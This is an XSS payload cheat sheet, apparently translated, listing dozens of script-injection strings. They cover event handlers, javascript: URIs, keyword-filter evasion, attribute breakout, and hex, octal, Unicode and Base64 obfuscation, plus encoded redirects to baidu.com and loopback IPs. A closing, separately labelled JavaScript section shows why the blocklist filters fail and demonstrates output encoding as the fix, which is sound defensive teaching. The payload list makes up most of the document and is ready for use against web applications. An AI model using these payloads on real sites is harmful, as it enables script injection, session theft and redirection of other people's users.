<script>alert("xss");</script>
<img src=1 onerror=alert("xss");>
<input onfocus="alert('xss');">
<input onblur=alert("xss") autofocus><input autofocus>
<input onfocus="alert('xss');" autofocus>
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">
<svg onload=alert("xss");>
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>
<iframe onload=alert("xss");></iframe>
<video><source onerror="alert(1)">
<audio src=x onerror=alert("xss");>
<body/onload=alert("xss");>
<body
onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea onfocus=alert("xss"); autofocus>
<marquee onstart=alert("xss")></marquee>
javascript: pseudo-protocol
<a href="javascript:alert(`xss`);">xss</a>
<iframe src=javascript:alert('xss');></iframe>
<form action="Javascript:alert(1)"><input type=submit>
Spaces are filtered
Use / in place of a space
<img/src="x"/onerror=alert("xss");>
Keywords are filtered
(case variation, double writing)
<ImG sRc=x onerRor=alert("xss");>
<scrscriptipt>alert(1)</scrscriptipt>
<imimgg srsrcc=x onerror=alert("xss");>
Use %0A as a line break
%0A<script>alert("XSS");</script>
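Angle brackets are filtered (choose single or double quotes depending on the context)
The <> tag characters are converted to entities; inject a triggering event directly into the input tag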
' onmouseup=alert(123)//
' onerror='alert(123)
' onmousemove='javascript:alert(1)
" onfocus="alert(document.domain)"
" onclick=alert(document.domain)
"onmouseover = "alert(document.domain)"
String concatenation
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
<script>top["al"+"ert"](`xss`);</script>
Using comments, tag parsing precedence, etc.
<<script>alert("xss");//<</script>
<title><img src=</title>><img src=x onerror="alert(`xss`);">
<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>
Encoding bypass
Unicode encoding bypass
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Hex bypass
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
ASCII code bypass
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
URL encoding bypass
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Octal
<img src=x onerror=alert('\170\163\163')>
Base64 bypass
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"> redirects to Baidu
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
Parentheses are filtered
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
URLs are filtered
Use URL encoding
<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
1. Decimal IP
<img src="x" onerror=document.location=`http://2130706433/`>
2. Octal IP
<img src="x" onerror=document.location=`http://0177.0.0.01/`>
3. Hex
<img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>
4. In HTML tags, // can be used in place of http://
<img src="x" onerror=document.location=`//www.baidu.com`>
5. Use the Chinese full stop (。) in place of the English period
<img src="x" onerror="document.location=`http://www。baidu。com`">//automatically redirects to Baidu
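Added example, not part of the original page: the keyword-filter and angle-bracket cases above run through two weak filters and then through context-aware output encoding, to show why the blocklists fail and what the fix looks like. All function names are hypothetical; the three payloads are copied from the lists above.

```javascript
// Weak filter 1: case-sensitive, single-pass removal of blocked keywords.
function stripKeywordsOnce(s) {
  return s.replace(/script|onerror/g, "");
}

// Weak filter 2: encodes only < and >, so quotes still work inside attributes.
function encodeAngleOnly(s) {
  return s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Hardened: encode every character that can end a text node or a quoted
// attribute value, in one pass over the input.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Renders user input into a single-quoted attribute (the input-tag case).
function renderInput(value, encoder) {
  return "<input value='" + encoder(value) + "'>";
}

// Payloads copied from the page.
const doubled = "<scrscriptipt>alert(1)</scrscriptipt>";
const mixedCase = '<ImG sRc=x onerRor=alert("xss");>';
const attrBreak = "' onmouseup=alert(123)//";

function demo() {
  return {
    // Removing the inner keyword reassembles the outer one.
    doubledAfterStrip: stripKeywordsOnce(doubled),
    // Mixed case never matches the case-sensitive pattern.
    mixedCaseAfterStrip: stripKeywordsOnce(mixedCase),
    // No angle brackets in the payload, so the quote closes the attribute.
    attrWeak: renderInput(attrBreak, encodeAngleOnly),
    // The quote is encoded and the payload stays inside the value.
    attrSafe: renderInput(attrBreak, escapeHtml),
    // Even the reassembled tag is inert once it is encoded on output.
    doubledSafe: escapeHtml(stripKeywordsOnce(doubled)),
  };
}

console.log(demo());
```

escapeHtml covers HTML text and quoted attribute values only. Values placed in href, src or action also need a scheme allowlist, since the javascript: entries contain none of the encoded characters.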